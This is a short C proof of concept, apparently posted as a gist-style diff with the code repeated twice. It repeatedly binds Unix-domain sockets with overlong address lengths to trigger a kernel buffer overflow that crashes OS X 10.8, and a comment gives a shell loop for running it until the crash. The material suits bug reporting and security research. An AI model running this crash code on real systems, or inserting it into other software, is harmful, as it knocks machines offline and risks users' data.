bnoordhuis · February 8, 2014 12:01
diff --git a/un.c b/un.c
 // Crashes OS X 10.8, `cc un.c && while :; do ./a.out ; done` to run.
 // The buffer overflow usually gets triggered within the first three
 // or four runs.  Make sure you back up your data first!

 #include <assert.h>
 #include <stdio.h>
 #include <string.h>
 #include <errno.h>

 #include <sys/socket.h>
 #include <sys/un.h>
 #include <unistd.h>

 int main(void) {
  struct sockaddr_un *s;
  char buf[1024];
  size_t len;
  int fd;
  int rc;

  memset(buf, 'a', sizeof(buf));
  s = (struct sockaddr_un *) buf;
  s->sun_family = AF_UNIX;

  for (len = sizeof(*s); len < sizeof(buf); len += 1) {
    fd = socket(AF_UNIX, SOCK_STREAM, 0);
    assert(fd >= 0);

    rc = bind(fd, (struct sockaddr *) s, len);
    close(fd);

    if (rc) {
      perror("bind");
      printf("len=%zu\n", len);
      break;
    }

    buf[len] = 0;
    unlink(s->sun_path);
    buf[len] = 'a';
  }

  return 0;
 }
	// Crashes OS X 10.8, `cc un.c && while :; do ./a.out ; done` to run.
	// The buffer overflow usually gets triggered within the first three
	// or four runs. Make sure you back up your data first!

	#include <assert.h>
	#include <stdio.h>
	#include <string.h>
	#include <errno.h>

	#include <sys/socket.h>
	#include <sys/un.h>
	#include <unistd.h>

	int main(void) {
	struct sockaddr_un *s;
	char buf[1024];
	size_t len;
	int fd;
	int rc;

	memset(buf, 'a', sizeof(buf));
	s = (struct sockaddr_un *) buf;
	s->sun_family = AF_UNIX;

	for (len = sizeof(*s); len < sizeof(buf); len += 1) {
	fd = socket(AF_UNIX, SOCK_STREAM, 0);
	assert(fd >= 0);

	rc = bind(fd, (struct sockaddr *) s, len);
	close(fd);

	if (rc) {
	perror("bind");
	printf("len=%zu\n", len);
	break;
	}

	buf[len] = 0;
	unlink(s->sun_path);
	buf[len] = 'a';
	}

	return 0;
	}